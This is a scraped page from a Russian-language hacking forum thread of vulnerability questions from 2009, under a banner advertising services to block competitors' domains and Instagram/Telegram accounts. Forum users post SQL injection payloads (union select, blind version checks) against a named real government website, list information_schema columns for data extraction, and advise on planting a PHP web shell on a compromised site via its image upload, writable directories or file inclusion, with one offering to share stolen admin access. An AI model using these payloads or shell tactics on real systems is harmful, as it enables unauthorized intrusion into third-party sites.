УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 583 из 2438

583

Опции темы

Поиск в этой теме

Опции просмотра

#5821

07.03.2009, 11:32

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Цитата:

Сообщение от попугай

что тут у нас такое?

http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/* а не работает...

Нету вывода.Юзай как слепую.

Код:

http://prescott-az.gov/news/index.php?id=1468+and+substring(version(),1,1)=4/*

#5822

07.03.2009, 12:40

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

Провел на форуме:
3009843

Репутация: 204

Вывода нет. Один запрос переходит в другой.

#5823

07.03.2009, 15:26

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

Сообщение от jokester

И эта ничем не хуже, просто ненужное надо убрать 2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4+from+information_schema.tables.html

вот именно, мы же не для феньки разбирали это всё)

Цитата:

1+union+select+tables.*,tables.*,tables.*,1+from+i nformation_schema.tables.html

tables:

Цитата:

TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
TABLE_TYPE
ENGINE
VERSION
ROW_FORMAT
TABLE_ROWS
AVG_ROW_LENGTH
DATA_LENGTH
MAX_DATA_LENGTH
INDEX_LENGTH
DATA_FREE
AUTO_INCREMENT
CREATE_TIME
UPDATE_TIME
CHECK_TIME
TABLE_COLLATION
CHECKSUM
CREATE_OPTIONS
TABLE_COMMENT

& columns:

Цитата:

TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
COLUMN_NAME
ORDINAL_POSITION
COLUMN_DEFAULT
IS_NULLABLE
DATA_TYPE
CHARACTER_MAXIMUM_LENGTH
CHARACTER_OCTET_LENGTH
NUMERIC_PRECISION
NUMERIC_SCALE
CHARACTER_SET_NAME
COLLATION_NAME
COLUMN_TYPE
COLUMN_KEY
EXTRA
PRIVILEGES
COLUMN_COMMENT

#5824

07.03.2009, 16:42

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Ситуация.
Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
Выручайте!

#5825

07.03.2009, 16:57

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Как понять "не знаю папку на запись" ?

Лей в ту папку, куда из админки заливается твоя картинка, права должны быть

#5826

07.03.2009, 17:00

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Я в неё и пробовал, нифига =(

#5827

07.03.2009, 17:04

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от Imperou$

Я в неё и пробовал, нифига =(

Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл

#5828

07.03.2009, 17:12

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Цитата:

Сообщение от Imperou$

Возможно картинка хранится в базе, а не в файловом варианте. И 3451 некий айди картинки вытаскивающий и показывающий ее. Второй вариант - от картинки обрезается расширение и настоящее имя ее вроде 3451.jpg ... Ну или много еще чего. Слишком размывчато все описал.

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#5829

07.03.2009, 17:59

Imperou$

Познающий

Регистрация: 23.05.2008

Сообщений: 84

Провел на форуме:
192463

Репутация: 97

Куда не пробую, не выходит...

"Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)"
Искал папку tmp, чаще всего просто встречал-не нашёл.

Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся.
Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.

#5830

07.03.2009, 19:01

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Не хватает прав, ищи диру доступную для записи..
Можешь скинуть в личку, посмотрю, ради интереса.

Страница 583 из 2438

583

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход